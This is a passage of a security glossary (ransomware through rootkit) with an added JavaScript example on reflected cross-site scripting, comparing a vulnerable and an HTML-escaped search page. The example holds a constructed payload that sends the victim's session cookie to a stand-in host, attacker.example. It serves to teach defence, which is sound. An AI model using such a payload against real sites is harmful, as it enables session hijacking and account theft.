ransomware – a form of malicious software (malware) that prevents or restricts use of one or more digital devices or applications, typically by encrypting the victim's data or locking the device, until a sum of money (the ransom) is paid.
RAT – a remote access tool or remote access trojan; software used as a form or component of malware that gives an attacker covert remote control over a target computer or other digital device.
recovery point objective (RPO) – the maximum amount of data loss or corruption that can be tolerated (usually expressed as a period of time, for example "no more than 15 minutes of transactions") in the event of a system disruption. This in turn sets the backup, replication and other failsafe requirements for the system. For example, a hotel or airline booking system may have zero tolerance for data loss (no transaction can be permitted to be lost, because it cannot be recovered through any other means), which requires a durable, replicated log of every transaction so that all of them can always be recovered.
recovery time objective (RTO) – the targeted amount of time (days, hours, minutes or seconds) within which a service, application or process must be restored after any disruption. It should be derived from the availability rating set by the owner: the recovery time objective must not exceed the downtime permitted by the availability requirement.
red team – a group of offensive security specialists who emulate a realistic adversary against a critical or sensitive system, infrastructure, organisation or website, usually over an extended engagement, in order to find exploitable weaknesses and to test how well the defenders (the blue team) detect and respond. The term is used both for the penetration testers working together on such an objective and for the exercise itself.
reflective (non-persistent) cross-site scripting – a web vulnerability in which a web application copies untrusted input from a request (for example a URL query parameter or form field) into its response without escaping it, so that attacker-supplied script is "reflected" back and executes in the victim's browser within the vulnerable site's origin. The attacker must persuade the victim to open a crafted link or submit a crafted form that looks legitimate, typically via a phishing message; the injected script can then steal session tokens, perform actions as the user or alter what the user sees. It is generally rated lower risk than stored cross-site scripting because each attack targets individual users rather than every user of the application and requires an additional user action, but it is still a serious defect, and the mitigation is the same: encode untrusted data for the context in which it is rendered, supported by a Content Security Policy. See also persistent (non-reflective) cross site scripting.
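As an added example (not part of this glossary), the JavaScript below renders a search-results page first without and then with output encoding, and passes a constructed attacker link through both to show the reflected script landing in the page. The site and attacker hostnames, the page markup and the payload are all assumed for illustration.

```javascript
// Added example, not from the glossary: reflected XSS in a server-rendered
// search page, vulnerable form beside the hardened form.
// All URLs, markup and the payload below are constructed for illustration.

// HTML-escape the characters that can break out of a text or attribute
// context. This is the standard mitigation when untrusted input is placed
// into an HTML body or quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// VULNERABLE: the query parameter is copied into the response verbatim.
// Whoever gets a victim to open ?q=<payload> runs script in the victim's
// browser, in this site's origin (cookies, DOM, same-origin requests).
function renderSearchVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`;
}

// HARDENED: the same page with the reflected value encoded for HTML text.
function renderSearchSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`;
}

// Constructed attacker payload: exfiltrates the session cookie to a host
// the attacker controls. (assumed hostnames: shop.example, attacker.example)
const payload =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// The link as it would be sent to a victim, e.g. inside a phishing email.
const attackerUrl =
  'https://shop.example/search?q=' + encodeURIComponent(payload);

// Extract a query parameter the way a web framework would: URL parsing
// percent-decodes the value, restoring the raw <script> tag.
function queryParam(url, name) {
  return new URL(url).searchParams.get(name);
}

// Run the attacker link through both renderers and return the two pages.
function demo() {
  const q = queryParam(attackerUrl, 'q');
  return {
    decodedQuery: q,
    vulnerable: renderSearchVulnerable(q),
    safe: renderSearchSafe(q),
  };
}

console.log(demo());
```

The vulnerable page contains the attacker's `<script>` tag intact, so the browser executes it; the hardened page contains `&lt;script&gt;`, which the browser displays as text. Note that the escaping shown is correct only for HTML text and quoted attributes; a value placed inside a JavaScript block, a URL or a CSS rule needs the encoding for that context instead.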
residual risk – refers to the remaining possibility of loss and impact after security controls (the risk response) for an item have been applied.
resilience – the ability to remain functional and capable in the face of threat or danger, or to return to function rapidly following any disruption.
risk – a situation involving exposure to significant impact or loss. In formal frameworks, risk is quantified using probability (often expressed as a percentage) and impact (often expressed as a financial amount). Other parameters can include proximity (how soon the risk may be encountered) and information about which assets, services, products and processes could be affected.
risk assessment – a systematic process for the proactive identification of potential hazards or gaps in an existing or planned activity, asset, service, application, system or product.
risk-based – an approach that considers the financial impact of a failure, its probability and its proximity to determine its comparative significance and its priority for treatment.
risk register – a central repository that contains an entry for each potential, significant loss or damage exposure. Usually there is a minimum materiality threshold, for example a minimum potential financial loss value that must be met or exceeded before an entry in the repository is required. If a risk does occur, it technically becomes an issue (rather than a risk). Issues can continue to be tracked within the risk register until the impact has been successfully managed and the root cause or causes have been resolved to the extent that the risk is unlikely to recur.
rogueware – see scareware.
rootkit – a set of software tools used by attackers to gain and retain privileged (root, administrator or kernel-level) access to and control over a target device. Part of the function of a rootkit is usually to hide the attacker's files, processes and network connections from the operating system and security tools, in order to avoid detection and removal of the malware.